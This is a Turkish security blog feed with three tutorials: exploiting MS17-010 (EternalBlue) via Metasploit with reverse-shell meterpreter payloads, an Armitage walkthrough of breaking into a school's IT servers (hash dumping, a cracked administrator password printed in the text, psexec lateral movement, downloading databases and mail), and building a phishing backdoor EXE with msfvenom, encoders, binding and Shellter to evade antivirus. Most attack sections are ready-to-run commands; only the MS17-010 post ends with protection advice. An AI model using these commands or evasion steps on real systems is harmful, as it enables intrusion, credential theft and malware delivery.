metasploit arşivleri • CanYouPwnMe! - For Cyber Security Researchers https://canyoupwn.me cypm! Wed, 04 Jul 2018 16:13:37 +0000 tr hourly 1 https://wordpress.org/?v=6.0 https://canyoupwn.me/wp-content/uploads/2016/02/cropped-Başlıksız-1-32x32.png metasploit arşivleri • CanYouPwnMe! - For Cyber Security Researchers https://canyoupwn.me 32 32 TR | MS17-010 Zafiyeti ve Korunma Yöntemleri https://canyoupwn.me/tr-ms17-010-zafiyeti-ve-korunma-yontemleri/ https://canyoupwn.me/tr-ms17-010-zafiyeti-ve-korunma-yontemleri/#comments Sat, 22 Jul 2017 14:47:38 +0000 https://canyoupwn.me/?p=7071 CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Shadow Brokers ekibi tarafından NSA’ye ait Windows Hacking araçları bir kaç ay önce sızdırıldı. Windows bilgisayarları kolayca istismar etmek için NSA tarafından yazılan/kullanılan araçlar adete bir cephanelik gibi içerisinde çok önemli araçlar bulunmaktadır.Eternalblue & Doublepulsar olarak adlandırılan kısaca smb üzerinden dll injection yaparak hedefe sızmayı sağlıyor.Hatta EternalBlue zafiyetinden yararlanarak WannaCry ve Petya zararlı yazılımları dünyada […]

TR | MS17-010 Zafiyeti ve Korunma Yöntemleri Cihan Mehmet Doğan

]]>
CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Shadow Brokers ekibi tarafından NSA’ye ait Windows Hacking araçları bir kaç ay önce sızdırıldı. Windows bilgisayarları kolayca istismar etmek için NSA tarafından yazılan/kullanılan araçlar adete bir cephanelik gibi içerisinde çok önemli araçlar bulunmaktadır.Eternalblue & Doublepulsar olarak adlandırılan kısaca smb üzerinden dll injection yaparak hedefe sızmayı sağlıyor.Hatta EternalBlue zafiyetinden yararlanarak WannaCry ve Petya zararlı yazılımları dünyada birçok sistemi olumsuz etkilemiştir.

Araçlara aşağıdaki linkten ulaşabilirsiniz

https://github.com/misterch0c/shadowbroker

Tenable Network Security ekibi yaptığı açılamada.
Sızdırılan veriler arasında birçok exploit ve zero-day açıkları bulunuyor. Hatta bazı exploitler seçili Windows sistemleri üzerinde ‘God Mode’ özelliği bile sunuyor. Hedeflenen ürünler arasında Lotus Notes, Lotus Domino, IIS, SMB, Windows XP, Windows 8, Windows Server 2003 ve Windows Server 2012 bulunuyor.

Yayınlanan araçlardan en çok dikkat çekeni Windows’taki CVE-2017-010 SMB güvenlik açığını inceleyeceğiz.Shodow Brokers bu belgeleri 14 Nisanda açıklamıştı.Windows Mart ayında bu zafiyetin yamasını daha önceden yayınlamıştı.Yamanın yayınlanmasına rağmen güncelleme yapmayan bilgisayarlar için potansiyel olarak hala tehlike halindedir.Bu zafiyetin kullanılabilmesi için 445 smb portunun açık olması gerekmektedir.

CVE-2017-010 SMB zafiyeti Windows XP işletim sistemlerde görülen MS08-067(exploits/windows/smb/ms08_067_netapi) zafiyetini de akıllara getirdi ve daha fazla sistem etkilenmiş durumdadır.Aşağıda etkilenen sistemler listesi gözükmektedir.

Windows Server 2003 SP0 (x86)
Windows XP (all services pack) (x86) (x64)
Windows Server 2003 SP1/SP2 (x86)
Windows Server 2003 (x64)
Windows Vista (x86)
Windows Vista (x64)
Windows Server 2008 (x86)
Windows 7 (all services pack) (x86) (x64)
Windows Server 2008 R2 (x86) (x64)

Kontrol Yöntemleri

1)Python Script

Hedef makinada bu açıklığın olup olmadığını anlamak için aşağıdaki python scripti bu kontolü yapılabilmektedir. Kullanımı çok basitir.

Betiği indirelim.

wget https://raw.githubusercontent.com/nixawk/labs/master/MS17_010/smb_exploit.py

Python scripti çalıştırmak için argüman olarak taranmak istenen ip adresi yazılmalıdır.Tarama sonucunda hedef sistemde bu zafiyet varsa “is likely VULNERABLE to MS17-010!” yazısı çıkmaktadır eğer zafiyet bulunmuyorsa does “NOT appear vulnerable” yazısı çıkacaktır.

python smb_exploit.py 192.168.2.146

Taranan ip’de zafiyet olduğu gözükmektedir.

2)Metasploit Auxiliary

Metasploit ile yapacağımız taramalarda daha önce tespit ettiğimiz hedef IP adreslerini kullanacağız
CVE-2017-010 zafiyetinin bir makinada olup olmadığını anlamak için metasploit’te hazır bulunan smb_ms17_010 auxiliary’ini kullanırız.

msfconsole
msf> use auxiliary/scanner/smb/smb_ms17_010

Metasploit’te smb_ms17_010 auxiliary’e hedef ip’yi verdikten sonra bize CVE-2017-010 zafiyeti bulunup bulunmadığını söyleyecek.

msf>set rhosts 192.168.2.144

set rhosts komutundan sonra istenirse ip’lerin arasına boşluk konularak daha fazla ip taraması yapılabilmektedir.

msf>set rhosts 192.168.2.144 192.168.2.146 10.15.124

[!] 192.168.2.144:445 – Host is likely VULNERABLE to MS17-010! —>Makinada zafiyet MS17-010 zafiyeti var.

3)Nmap Scripts

Hedef sistemde bu açıklığın olup olmadığını anlamanın diğer bir yöntemi ise nmap aracıdır.MS017-01 exploitnin kontrolü için yazılan betik nmap scrips klasörü altına atıldıktan sonra kullanıma hazır olacaktır.Script’,in nmap script klasörü içerisine eklenmesi gerekmektedir.

cd /usr/share/nmap/scripts

wget https://svn.nmap.org/nmap/scripts/smb-vuln-ms17-010.nse

Bu açıkık smb 445 portundan kaynaklandığı için aşağıdaki nmap komutu ile kontol sağlanmış olur.

nmap -p445 --script smb-vuln-ms17-010 192.168.1.42

Tarama sonucunda ms17-010 açıklığının olduğu anlaşılmış oldu.

4)Online Tarama

Eğer internete açık Windows sunucularınızda MS17-010 zafiyetinin olup olmadığını http://ms17-10.com üzerinden de online olarak ücretsiz bir şekilde test edebilirsiniz.

Exploit Etme İşlemleri

1)Metasploite Exploit Ekleme

Metasploit kullanarak meterpreter için aşağıdaki linkeki dosyaları eklemeliyiz.

https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

Exploit windows’a ait dll dosyaları içierdiği için wine32’nin kurulu olması gerekmektedir.

Kullandığınız işletim sisteminiz 64 bit ise aşağıdaki komut ile wine32 kurulmalıdır.

dpkg --add-architecture i386 && apt-get update && apt upgrade -y && apt autoremove

apt-get install wine32

Kurulum bittikten sonra wine programının tam olarak çalıştığından emin olmak için küçük herhangi bir exe dosyası çalıştırmayı deneyiniz.

Örnek olarak cmd.exe yi çalıştırabilirsiniz

wine cmd.exe
exit

Exploit için ilk önce metasploit’in veritabanı olarak kullandığı postgresql servisi başlatılmalıdır.

service postgresql start

Metasploit dizindeki Windows smb exploitlerinin bulunduğu dizine terminalden gelinir.

cd /usr/share/metasploit-framework/modules/exploits/windows/smb/

Exploit belirtilen dosya içine indirilir.

wget https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit/blob/master/eternalblue_doublepulsar.rb

İndirilen exploit’in metasploit tarafından algılayabilmesi için postgresql servisi yeniden başlatılır.

service postgresql restart

Terminalden yeni bir sekme açalım ve ana dizine gidelim ve exploitimizin çalışması için gerekli olan dosyaları indirelim.Gerekli dosyaların bulunduğu dizinen gidelim ve dosya yolunu kaydedelim.

cd ~
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git
cd Eternalblue-Doublepulsar-Metasploit/
cd deps/
pwd

Dosya yolunu indirdiğimiz exploitin içine eklemeliyiz.Exploit’i açalım.

nano /usr/share/metasploit-framework/modules/exploits/windows/smb/eternalblue_doublepulsar.rb

TARGETARCHITECTURE ve ETERNALBLUEPATH’a /root/Eternalblue-Doublepulsar-Metasploit/deps dizinini ekleyelim.

Böylece her exploiti kullanmak istediğimizde kütüphanelerin bulunduğu dizini her seferinde yazmak zorunda kalmayız.
ssss

Metasploit açtıktan sonra “eternalblue_doublepulsar” exploitimizi açalım.Exploit edilecek hedef ip yazılır(rhost) daha sonra hedef işletim sistemine göre target(set target 8) belirlenir.info komutu ile exploitin desteklediği işletim sistemleri belirlenebilir.Hedef işletim sisteminin mimarisi belirlenir(32 mi 64 bit mi).Exploit edilme işlemi sonrasında hedef sisteme sızmak ve istenilen işlemleri gerçekleştirmek için payload belirlenmelidir(set payload).Sardırgan ip adresi(lhost) sisteme girilir ve exploit işlemi başlatıtır(run ya da exploit).

msfconsole
msf>use exploit/windows/smb/eternalblue_doublepulsar
msf>show options
msf>set rhost 192.168.2.144
msf>set target 8
msf>set targetarchitecture x64
msf>set payload windows/x64/meterpreter/reverse_tcp
msf>set lhost 192.168.2.128
msf>run
 Biz Windows 7 64 bit kurulu güvenlik duvarı açık bir bilgisayara meterpreter bağlantısı yapmayı başardık.Eğer
Windows XP sp3 içinse sadece bir argümanı değiştirdiğimizde yine meterpreter ekranına düşebiliriz.
Meterpreter’e background yazıp Windows 7 meterpreter oturumu arka plana alınır.Windows Xp sistemin ip adresi yazıldıktan sonra set target 0 komutu ile Xp seçilir ve run komutu ile exploit başlatıldığında aynı şekilde yeni bir meterpreter oturumu oluşur.

2)Hazır Metasploit Exploiti

Metasploit’e bu açıklık çıktıktan hemen sonra eklenen ms17_010_eternalblue exploit’i birinci yöntemde exploit etmektedir.Fakat bu exploit sadece Windows 7 ve Server 2008 R2 (x64) sistemlerde çalışmaktadır.
use exploit/windows/smb/ms17_010_eternalblue
set rhost 192.168.69.146
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.69.138
run
 
 

 

Wannacry Virüsü

Wannacry virüsü Mayıs ayında dünya çapında birçok ülkeyi etkileyen büyük çapta bir fidye yazılım saldırısı gerçekleştirilmiştir. Wannacry fidye virüsü hedeflerini mail atma phishing gibi sosyal mühendislik yöntemleri yerine hiçbir kullanıcı etkileşimine gerek kalmadan Microsoft Windows’un SMBv1 sisteminde bulunan MS17-010 kapsamında tanımlanıp güncelleme yapılmamış bilgisayarlardaki güvenlik açığından faydalanarak bulaşmaktadır.Türkiye wannacry virüsünden pek etkilenmese de Rusya ve İngiltere’ninde içinde bulunduğu 74 ülke etkilenmiştir.

Petya Fidye Yazılımı

Petra  sırasıyla Ukrayna, Danimarka, İspanya ve Fransa’da görülmeye başlandı.Bulaştığı yerlerden şirketleri etkileyerek 300 dolarlık fidye talep etmektedir.Petya yazılımı ransomware’in bu yeni gelişmiş bir versiyonu olacak düşünülebilir.Geçen aylarda sadece 72 saatte 300.000 sistem ve sunucuya bulaştığı gözlemlenmiş ve tıpkı WannaCry gibi Windows SMBv1 güvenlik açığı (MS17-010) sayesinde hızla yaygınlık göstermiş ve bulaşmasıda kolay olmuştur.

Petra SMBv1 güvenlik açığının dışında spam e-postalar ile sisteme enfekte olmaktadır. Bilgisayar kullanıcılarına CVE-2017-0199 zafiyeti üzerinden sosyal mühendislik yömtemleriyle e-postalar yoluyla bulaştırılmaktadır.

Wannacry ve Petya’dan Korunma Yöntemi

Kullanılmakta olan Windows işletim sisteminin güncelleştirmeleri  düzenli olarak yapılmalıdır.Lisanslı, güncel antivirüs ve bilenen antivirüs yazılımı kullanılmalıdır.Antivirüsler kendi otomatik güncellemeleri dışında elle güncelleme yapılarak ,virüs imzaları sürekli güncel olmalıdır.445 portunu kullananSMBv1 protokolü kullanılmıyorsa kapatılmalıdır.Önemli verilerinizin tutulduğu sistemlerin düzenli olarak son  yedeklerini kontrol edilerek yedeklemeler otomatize bir şekilde yapılmalı.Alınan yedekler farklı bir sunucuda tutulmalıdır.Özellikle dışarıya açık UDP port 137 ve 138, TCP port 139 ve 445’i kapatılması gerekmektedir.Petrada görülen perfc.dat dosyası diğer sistemlere mail yoluyla gönderiliyor ve kuruluyor bunu önlemek için  PSexec’in çalıştırılmasını antivirüsler yoluyla engelleyin.Şirket çalışanları tarafından virüsün tüm sisteme yayılmasını önlemek için gerekiyorsa kullanıcılara dosyalara okuma izni verilmelidir.

TR | MS17-010 Zafiyeti ve Korunma Yöntemleri Cihan Mehmet Doğan

]]>
https://canyoupwn.me/tr-ms17-010-zafiyeti-ve-korunma-yontemleri/feed/ 1
TR | Armitage&Meterpreter Kullanımı https://canyoupwn.me/tr-armitage-meterpreter-kullanimi/ https://canyoupwn.me/tr-armitage-meterpreter-kullanimi/#respond Fri, 02 Sep 2016 10:33:16 +0000 https://canyoupwn.me/?p=4173 CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

METERPRETER : UYGULAMALI SIZMA SENARYOSU Bu yazıda armitage aktif olarak nasıl kullanılabilir, sistemlere nasıl sızılabilir ve en önemlisi Post Exploitation olarak neler yapılabilir bunlar incelenecektir ve uygulamalı olarak gösterilecektir. Biz bu senaryoyu kendi okulumuzda B.İ.M (Bilgi İşlem Merkezi) departmanına uyguladık. Öncelikle saldırdığımızın ağın topolojisini çıkardık ve adımlara başladık. Senaryonun Açıklaması; BİM(Bilgi işlem merkezi) sunucu bilgisayarlarından […]

TR | Armitage&Meterpreter Kullanımı CanYouPwnMe

]]>
CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

METERPRETER : UYGULAMALI SIZMA SENARYOSU

Bu yazıda armitage aktif olarak nasıl kullanılabilir, sistemlere nasıl sızılabilir ve en önemlisi Post Exploitation olarak neler yapılabilir bunlar incelenecektir ve uygulamalı olarak gösterilecektir. Biz bu senaryoyu kendi okulumuzda B.İ.M (Bilgi İşlem Merkezi) departmanına uyguladık. Öncelikle saldırdığımızın ağın topolojisini çıkardık ve adımlara başladık.

Ekran görüntüsü_2016-08-15_15-04-54

Senaryonun Açıklaması;

BİM(Bilgi işlem merkezi) sunucu bilgisayarlarından Endüstüri Müh. Proje Yönetimi sunucusu bulunmaktadır. Bu sunucu bilgisayarı güncellemelerden uzaktır. Üzerinde BİM’e dair bir program çalışmadığı için güvenlik önlemleri ihmal edilmiştir. Bu sunucu bilgisayarı daha önce açılmış olup şu an kullanılmadığı için bilgisayar üzerinde bulunan kullanıcı hesaplarından bir tanesini aynı zamanda diğer bilgisayarlarda kullanmaktadır. BİM’in işlerin yoğunluğundan dolayı hızlı bir şekilde ulaşabilme amacıyla BİM ağındaki bilgisayarlara ait varsayılan (başlangıç) değerlerini masaüstünde tutmaktadır. Daha önce bilgisayarı yenilenen BİM (okulun veri tabanı yöneticisi) önem vermediği giriş bilgilerini değiştirmemiştir. Bu sayede oradan alınan Administrator bilgileri ile diğer bilgisayara giriş sağlanmak amaçlanmıştır.
Amaç; Veri tabanı sunucusu bilgilerine erişmek, dolayısı ile veri tabanında bulunan verilere erişmek, fakat önce sunucu erişim bilgilerinin edinilmesi gerekmektedir.

 

İzlenecek Adımlar;

  • Ağı taranacak, hangi cihazların ayakta olduğu ve hangi işletim sistemlerinin kullanıldığı tespit edilecek.
  • Bazı işletim sistemlerinin bilinen açıklıkları bulunabilir, bu açıklıklar denenecek.
  • Sızılan bilgisayarlardan kullanıcılara ait hesap özetleri (hash) alınacak
  • Alınan hash’ler diğer sistemlerde denenecek.
  • Başarılı girişlere, oturum açma denenecek ve bilgi toplanmaya çalışılacak.

 

Senaryonun Uygulanması

Bilgisayar Kali Linux işletim sistemi ile başlatılır.

  •  Gerekli olan servisler başlatılır;
service postgresql start
service metasploit start
Armitage
  • Hangi ağda bulunulduğu tespit edilir, IP adresine bakılarak bu bilgi edinilebilir.

 

ekran-goruntusu_2016-08-15_15-04-54

 

Saldırgan İP Adresi
IP adresi ETH(Kablolu ağ) 10.10.208.85, WLAN(Kablosuz ağ) 10.10.122.202, taranması gereken ağ 10.10.20/24(BİM Sunucu Bilgisayarları) olacaktır.

  • Armitage ara yüzünden faydalanarak ağda hangi IP’lerin ayakta olduğu ve hangi işletim sistemi ile çalıştığı tespit edilir.

Ekran görüntüsü_2016-08-15_15-04-54

Quick Scan (OS detect) seçildiğinde, ekrana gelecek olan pencerede taranmak istenilen ağ bilgisi girilir.

Ekran görüntüsü_2016-08-15_15-04-54

Armitage Saldırılacak Ağ Taraması – 2

Ve sonucunun ekran alıntısı;

Ekran görüntüsü_2016-08-15_15-04-54

Armitage Saldırılacak Ağın Bilgisayarları – 1

Tarama sonucu elde edilen hedefler böyle üst üste görünür ise, hedef panelinde sağ tıklanıp Layout -> Stack seçeneği tıklanır.

Ekran görüntüsü_2016-08-15_15-04-54

Armitage Saldırılacak Ağın Bilgisayarları – 2

Artık hedefler bir dizi halinde görünecektir.

  • Hedeflerin üzerlerine gelerek işletim sistemlerini belirten bildirim yazısını görülmeye çalışılır, aranılan şey eski bir işletim sistemi. Mesela XP.

 

ekran-goruntusu_2016-08-15_15-04-54

Armitage Saldırılacak Ağın Bilgisayarları – 3

  • Bu işletim sisteminin IP değeri; 10.10.2.249 şimdi bu hedef tıklanıp, Armitage menüsünden Attacks -> Find Attacks seçenekleri takip edilir.

 

ekran-goruntusu_2016-08-15_15-04-54

Armitage Saldırılacak Ağ’a Otomatik Exploit Bulma – 1

Hedefin işletim sistemi ve Service Pack değeri göz önüne alınarak bir takım exploitler önerilecektir. Bu arama işlemi devam ederken ki ekran görüntüsü.

ekran-goruntusu_2016-08-15_15-04-54

Armitage Saldırılacak Ağ’a Otomatik Exploit Bulma – 2

Ve tarama bittiğinde ekrana bastırılacak olan bildirim penceresi.

ekran-goruntusu_2016-08-15_15-04-54

Armitage Saldırılacak Ağ’a Otomatik Exploit Bulma – 3

  • Şimdi hedefe sağ tıklanıp, Attack menüsünden başarı oranı yüksek bir expoit seçilir.

Ekran görüntüsü_2016-08-15_15-04-54

Armitage Saldırılacak Ağ’ın Açığını Kullanma

Bu exploit seçildiğinde ekrana bastırılacak olan pencere.

ekran-goruntusu_2016-08-15_15-04-54

Armitage Saldırılacak Ağ’ın Ayarları

Bu exploit için genelde bir ayarlama yapmak zorunda kalınmaz, çünkü başarılı bir exploit olarak tanınmaktadır. Ama her expoit için aynı şey geçerli değildir. Bazen dinleme portunun, bazen kullanılan payload’ın değiştirilmesi gerekir. Exploit çalıştırılır. Başarılı bir exploit sonrası exploit için açılan konsolda görülmesi gerekenler ve hedefin simgesindeki değişiklik.

ekran-goruntusu_2016-08-15_15-04-54

Armitage Saldırılacak Ağa Başarılı Giriş

  • Artık hedefe sızılmış, meterpreter oturumu açılmıştır. Şimdi sızılan sistemden veri toplamaya çalışılacaktır. Hedefle daha iyi etkileşim için meterpreter oturumu etkinleştirilir.
    Sağ tık -> Meterpreter 1 -> Interact -> Meterpreter Shell

Ekran görüntüsü_2016-08-15_15-04-54

Armitage Saldırılan Ağ’da İşlemler

Hedefe sağ tık -> Meterpreter 1 -> Access -> Dump Hashes Isass method (Her işletim sistemi için Dump Hashes Isass method başarı ile sonuçlanmayabilir)

Ekran görüntüsü_2016-08-15_15-04-54

Armitage Saldırılan Ağ’da Şifre Bulma

Ve kullanıcı hesaplarına ait özetlerin görüntüsü

Ekran görüntüsü_2016-08-15_15-04-54

Armitage Saldırılan Ağ’da Bulunan Kullanıcı ve Şifresi

Burada kırmızı çerçeve içerisine alınan kullanıcı bilgileri genel bir kullanıcıya benziyor. Buradaki kullanıcı adıyla diğer bilgisayarlara giriş yapılabilir.
Not: Buradan sonra kullanıcı hesapları üzerinden ilerlemek adına birbirinden farklı yollar mevcut,

  • Şifreleri kırılmaya çalışılabilir
  • Elde edilen bilgiler, tüm ağdaki bilgisayarlara girmek için kullanılabilir.

Sızılan bilgisayarda bulunan dosyalar incelenmeye başlanır. Bunun için izlenilecek yol

Hedefe sağ tık -> Meterpreter 1->Explore -> Browse Files
Sonrasındaki ekran çıktısı ile birlikteki alıntı.

Ekran görüntüsü_2016-08-15_15-04-54

Armitage Saldırılan Ağ’da Dosya Gezintisi – 1

 Daha sonra “C:\Documents and Settings\” dizinine geçilir. İlgi çeken bir dosya olursa sağ tıklanıp indirilir.

Ekran görüntüsü_2016-08-15_15-04-54

Armitage Saldırılan Ağ’da Dosya İndirme – 1

İndirme tamamlandığındaki ekran alıntısı

Ekran görüntüsü_2016-08-15_15-04-54

Armitage Saldırılan Ağ’da Dosya İndirme – 2

İndirilenlere ulaşmak için;

Ekran görüntüsü_2016-08-15_15-04-54

Armitage Saldırılan Ağ’da İndirilen Dosyaları Görüntüleme

  • Bu bilgisayardan kullanıcı hesap özetlerinden başka bir şey çıkmadı. Şifreler kırılmaya çalışılır. Toplanılan kullanıcı bilgilerinin özetlerini görüntülemek için,

 

ekran-goruntusu_2016-08-15_15-04-54

Armitage Saldırılan Ağ’da Hashlenmiş Şifreyi Çözme – 1

ekran-goruntusu_2016-08-15_15-04-54

Armitage Saldırılan Ağ’da Hashlenmiş Şifreyi Çözme – 2

ekran-goruntusu_2016-08-15_15-04-54

Armitage Saldırılan Ağ’da Hashlenmiş Şifreyi Çözme – 3

Administrator:12Qwaszx şifre alınmıştır.
10- Şimdi 10.10.2.52(EBABİL) sunucuna metasploit psexec oturumu açmayı deneyip, başarılı olunduğunda meterpreter oturumu açılmaya çalışılacak. Hedefe sağ tıklayıp
Login -> psexec modülü seçilir.

ekran-goruntusu_2016-08-15_15-04-54

Armitage Bulunan Şifre İle Başka Ağlara Sızma – 1

ekran-goruntusu_2016-08-15_15-04-54

Armitage Bulunan Şifre İle Başka Ağlara Sızma – 2

Uyarı: “User everse connection” seçeneğini tıklanmaz ise payload oluşturulur ve karşıya gönderilir, sizin için çalıştırılır. Fakat, gelen bağlantı isteğini dinleyip yorumlayacak bir modül çalışmadığı için bu istek paketleri düşürülür.
Şimdi modüler çalıştırılır. Girişim başarılı olduğunda modül konsoluna dökülecek bildirim.

Ekran görüntüsü_2016-08-15_15-04-54

Armitage Bulunan Şifre İle Başka Ağlara Sızma – 3

Şimdi sızılan bilgisayar incelenmeye başlanır. Direk olarak E:// sürücüsüne gidip dosyalarına bakılabilir.

Ekran görüntüsü_2016-08-15_15-04-54

Armitage Bulunan Şifre İle Ebabil’e Erişim – 1

Ekran görüntüsü_2016-08-15_15-04-54

Armitage Bulunan Şifre İle Ebabil’e Erişim – 2

  • Artık son hamleyi yapmanın zamanı geldi. Eğer veri tabanı yöneticisi yani 10.10.2.35(ORACLE_HHO) bilgisayarına sızıp veri tabanına erişim bilgilerini elde edilebilirse senaryo tamamlanmış olacak. 10.10.2.52 Ebabil sunucusuna yapılan işlemler tekrarlanıp gerekli olan dosyalar indirilir. Son olarak indirilen dosyalar aşağıda görüldüğü gibidir.

Ekran görüntüsü_2016-08-15_15-04-54

Saldırılan Ağlardan İndirilen Veritabanları

Ekran görüntüsü_2016-08-15_15-04-54

Saldırılan Ağlardan İndirilen Mail Veritabanı

Ekran görüntüsü_2016-08-15_15-04-54

Saldırılan Ağlardan İndirilen Kütüphane Günlük Kayıtları

Ekran görüntüsü_2016-08-15_15-04-54

Saldırılan Ağlardan İndirilen Veritabanları – 2

Ekran görüntüsü_2016-08-15_15-04-54

Saldırılan Ağlardan İndirilen Log Kayıtları

Ekran görüntüsü_2016-08-15_15-04-54

Saldırılan Ağlardan İndirilen Ebabil Dosyaları

TR | Armitage&Meterpreter Kullanımı CanYouPwnMe

]]>
https://canyoupwn.me/tr-armitage-meterpreter-kullanimi/feed/ 0
TR | Backdoor Hazırlanması ve Antivirüs Bypass Edilmesi https://canyoupwn.me/tr-backdoor/ https://canyoupwn.me/tr-backdoor/#comments Thu, 25 Aug 2016 17:14:15 +0000 https://canyoupwn.me/?p=3899 CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Backdoor (Arka Kapı) Nedir? Backdoor, hedef sistem üzerinde ki güvenlik önlemlerini atlatarak, hedef sistem üzerinde uzaktan erişim hakkı kazanmayı sağlayan zararlı yazılımlardır. Genellikle hedef sistemde, port açarak veya açık olan portları kullanarak saldırganın, hedef sistem üzerinde erişim hakkı kazanması sağlanır. Backdoor hakkında bilgi sahibi olduğumuza göre Phishing saldırılarının vazgeçilmezi olan zararlı yazılımın/dosyanın nasıl oluşturulabileceğini ve […]

TR | Backdoor Hazırlanması ve Antivirüs Bypass Edilmesi CypmUni PAÜ

]]>
CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Backdoor (Arka Kapı) Nedir?

Backdoor, hedef sistem üzerinde ki güvenlik önlemlerini atlatarak, hedef sistem üzerinde uzaktan erişim hakkı kazanmayı sağlayan zararlı yazılımlardır. Genellikle hedef sistemde, port açarak veya açık olan portları kullanarak saldırganın, hedef sistem üzerinde erişim hakkı kazanması sağlanır. Backdoor hakkında bilgi sahibi olduğumuza göre Phishing saldırılarının vazgeçilmezi olan zararlı yazılımın/dosyanın nasıl oluşturulabileceğini ve bu zararlı dosyanın, antivirüs ve anti-mallware programları tarafından tespitinin nasıl minimuma indirilebileceğini inceleyebiliriz. Bu yazıda örnek olarak exe formatında zararlı çalışıtırılabilir dosya hazırlayacağız. Hazırlayacağımız exe, kullanıcı programı çalıştırdığında bize kullanıcının bilgisayarına erişmemizi sağlayacak bir meterpreter oturumu sağlayacak. Hatırlamakta fayda var ki exe formatının dışında python, asp, aspx, dll, elf gibi bir çok formatta zararlı dosya oluşturma imkanı vardır. msfvenom –help-formats komutu ile geri kalan formatlarıda görüntülemek mümkündür.

Meterpreter nedir ?

Meterpreter, sıklıkla kullanılan bir metasploit payloadudur. Bir arka kapı olarak çalışır. Yüklenen sistemde, sistem bilgileri, hedef sistemden ve hedef sisteme dosya transferi, hedef sistem komut satırına ulaşım gibi imkanlar sağlar. Meterpreter komutlarından bir kaçına aşağıdaki ekran görüntülerinden ulaşabilirsiniz.

Ekran görüntüsü_2016-08-15_15-04-54

Ekran görüntüsü_2016-08-15_15-04-54

Hızlıca bu işlemleri nasıl yapacağımıza geçelim. İlk olarak içinde sadece meterpreter shell olan bir exe oluşturacağız ve bu halini virustotalde ( Virustotal, ücretsiz, küçük boyutlu yazılımlarının antivürüs programlarınca testlerini yaparak sonuçlarını veren bir servis. https://www.virustotal.com ) taratacağız.
İlk olarak msfvenom kullanarak yapacağız. Msfvenom; metasploit framework ile birlikte gelen zararlı kod oluşturmamıza yardımcı olan bir araçtır.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.101 LPORT=443 -f exe -o /root/Desktop/zararli1.exe

-p : Payload
-f : Zararlı dosya formatı
LHOST : Kali IP Adresi (Local IP Adres)
LPORT : Kali Portu. (Zararlının bize ulaşmasını sağlayacak port)

NOT: Her hangi bir linux dağıtımda yada sunucu üzerinde bağlantı sağlanmak istenilen portun açık olduğuna dikkat edilmelidir. Eğer session gelmiyorsa bunun ilk nedenlerinden birisi dinlenilen portun açık olmama ihtimalidir.

Ekran görüntüsü_2016-08-15_15-04-54

Uygulamayı virustotal de taratarak sonuçlarına bakalım.

Ekran görüntüsü_2016-08-15_15-04-54

Görüldüğü gibi neredeyse bütün antivirüs programları tarafından yakalandık. Bu sefer oluşturacağımız zararlıyı encode ederek antivirüslerden kaçmaya çalışacağız.

Ekran görüntüsü_2016-08-15_15-04-54

 

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.101 LPORT=443 -f exe -o /root/Desktop/zararli2.exe -k -e x86/shikata_ga_nai -i 10

-e parametresiyle hangi encoderi kullanmasını istediğimiz söylüyoruz ve -i parametresiyle kaç kez encode edileceğini belirtiyoruz.
Yine çıkan exe yi taratarak sonuçlara bakıyoruz.

Ekran görüntüsü_2016-08-15_15-04-54

Yakalandığımız antivirüs programı sayısında bir azalma var ama istediğimiz kadar değil.
Birde bind etme işlemini deneyelim. Bind etmek, hali hazırda var olan bir exe nin içine zararlı kodumuzu yerleştirme olayına denir.
Bunun için iki ayrı yöntem deneyeceğim. Birincisi yukarıdaki örneklerde kullandığımız msfvenom, bir diğeri ise Shellter isimli uygulama.
Msfvenom ile devam edelim. Öncelikle normal bir exe dosyasına ihtiyacımız var, ben tercihen kali linuxta /usr/share/windows-binaries/ içerisinde bulunan plink.exe isimli exe yi kullanacağım. Siz herhangi başka bir uygulamada seçebilirsiniz. Burada seçtiğimiz uygulama bizim için sadece aracı olacak ve biz uygulamanın yanına zararlı kodumuzu koyarak yeni bir exe dosyası oluşturacağız.
Plink.exe isimli dosyanın bir kopyasını masaüstüne setup.exe olarak kaydediyorum. Virustotal.com sitesinden uygulamayı taratıyoruz.

Ekran görüntüsü_2016-08-15_15-04-54

Sonuç olarak herhangi bir antivirüs programının içerisinde virüs bulduğu gözüküyor. Artık ilk halini biliyoruz. Şimdi sıra plink.exe uygulamasının içerisine zararlı kodumuzu yerleştirmeye geldi.

Ekran görüntüsü_2016-08-15_15-04-54

msfvenom -a x86 --platform windows -x setup.exe -k -p windows/meterpreter/reverse_tcp LHOST=192.168.56.101 LPORT=443 -f exe -o zararli3.exe -k -e x86/shikata_ga_nai -i 10

İnternetten indirdiğimiz setup.exe isimli uygulamanın yanına meterpreter shell bind ederek zararli3.exe olarak oluşturduk.

Ekran görüntüsü_2016-08-15_15-04-54

Yakalandığımız antivürs sayısı biraz daha azalmış gözüküyor. Daha farklı encoderlar ve faklı encoderlardan sırayla exe yı geçirerek sayıyı biraz daha azaltmamız mümkün.
Şimdi Shellter adlı uygulama ile bu işlemi deneyeceğiz. Shellter, exe dosyalarının içerisine payload yerleştirebilmemizi sağlayan ücretsiz bir araçtır.
Shellter uygulaması kali de kurulu gelmiyor. Kurmak için :

dpkg --add-architecture i386 && apt-get update && apt-get install wine32 && apt-get install shellter

komutunu yazmamız yeterli olacaktır. Kurulum tamamlandıktan sonra terminale shellter yazarak programı çalıştırabiliriz.

Ekran görüntüsü_2016-08-15_15-04-54

Karşımıza yukarıdaki gibi bir ekran gelecektir. Choose Operation Mode sorusuna A( auto ) cevabını vererek devam ediyoruz.

Ekran görüntüsü_2016-08-15_15-04-54

PE Target sorduğunda temiz halde bulunan exe dosyasının adresini veriyoruz. Shellter bizim için işlemleri otomatik olarak yapacaktır.

Ekran görüntüsü_2016-08-15_15-04-54

